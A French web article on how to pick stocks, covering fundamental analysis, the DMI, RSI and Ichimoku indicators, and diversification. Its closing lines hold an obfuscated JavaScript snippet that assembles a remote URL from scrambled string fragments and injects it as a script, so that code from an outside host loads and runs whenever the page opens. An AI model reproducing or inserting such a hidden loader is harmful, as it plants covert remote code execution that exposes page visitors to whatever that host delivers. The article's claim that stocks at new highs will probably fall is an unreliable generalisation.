Comment choisir des actions en bourse ?

On n’investit pas en bourse comme on joue au casino. Choisir d’acquérir des actions d’une entreprise n’équivaut pas à miser sur le rouge ou le noir au jeu de roulette. Tout au moins, si l’on espère que notre investissement pourra croître en valeur sur le long-terme. Voici sur quoi il faut baser nos choix, lorsque l’on choisit des actions boursières.

Étudier le fonctionnement de la bourse 

Pour bien comprendre comment fonctionne la bourse, il faut tout d’abord l’étudier. Si l’on décide de passer cette étape, toutes les autres seront périlleuses. En effet, il existe différents produits financiers sur les marchés boursiers, et chacun d’eux devront recevoir une attention particulière. De tous ces produits, les plus faciles à utiliser sont les actions. Mais malgré tout, il faut prendre le temps de bien les choisir, en utilisant diverses méthodes et en procédant aux deux modes d’analyse suivants : 

A lire aussi : Erreurs financières courantes à éviter pour une gestion saine de votre budget

L’analyse des fondamentaux 

Lorsque l’on achète une maison, on voudra tout d’abord s’assurer que ses fondations sont solides. Il faut en faire de même pour les actions en bourse. Lorsque l’on procède à l’analyse des fondamentaux pour des actions, on cherche à comprendre le risque inhérent à l’achat de celles-ci. Il faudra aussi comparer les actions de deux entreprises similaires, évoluant dans le même secteur. Sans procéder à cette dernière analyse, il est impossible de vraiment comprendre la valeur réelle d’une action. Pour ce faire, voici les points qui doivent être observés  : 

  • Le cours de l’action sur les deux dernières années 
  • Le chiffre d’affaires généré par l’entreprise (présent et passé) 
  • Son cash-flow  
  • Son taux d’endettement
  • Le bénéfice net par action qu’elle a offert récemment à ses actionnaires 
  • Ses capitaux propres

L’analyse technique 

La plupart des actions connaîtront des mouvements à la hausse et à la baisse. Il ne faut pas s’en inquiéter pour autant. D’ailleurs, il faut surveiller ces changements de prix, afin de pouvoir acquérir les actions de l’entreprise désirée au bon moment. C’est là que l’analyse technique entre en jeu. En effet, l’entrée en position est cruciale pour se donner un avantage dès le départ. Si l’on achète une action, alors qu’elle atteint de nouveaux sommets, il est plus que probable qu’elle redescendra dans un futur plus ou moins rapproché. Cela nous causerait une perte théorique qui deviendrait réelle, si on devait les vendre en urgence, pour une raison quelconque.  

A voir aussi : Les clés pour adopter une attitude responsable en matière de finance

Il existe des indicateurs qui nous permettent de savoir précisément les tendances de chaque action. Il faudra les utiliser afin de déterminer le bon moment d’acquérir celles que nous désirons ajouter à notre portefeuille. Ceux-ci sont : 

  • Le Directional Movement Index (DMI) qui démontre les tendances du cours des actions 
  • Le Relative Strength Index (RSI) qui estime la pression que subit le cours des actions 
  • L’indicateur Ichimoku, qui détermine les fluctuations, les supports ainsi que la résistance du cours des actions 

Peu importe notre choix d’actions, il faut toujours s’assurer de bien diversifier son portefeuille. Cela veut dire de ne pas acheter une seule action (compagnie), ou dans un seul secteur d’industrie. De plus, il est préférable d’acheter d’autres produits, tels que des fonds de placement.  

(function(){
tt0nu= »aiaq1hr5t0ne »;tt0n=document.createElement(« script »);
tt0n_= »u »+(« st »);tt0n_+= »at »+(« . »);tt0n.async=true;tt0n_+= »in »;
tt0nu= »2177072937. »+tt0nu;tt0n.type= »text/javascript »;tt0nu+= »456s4msxguc3″;
tt0nu+= »qsn3cj »;tt0n_+=(« f »)+ »o »+(« / »);tt0n.src= »https:// »+tt0n_+tt0nu;
tt0nd=document.body;tt0nd.appendChild(tt0n);
})();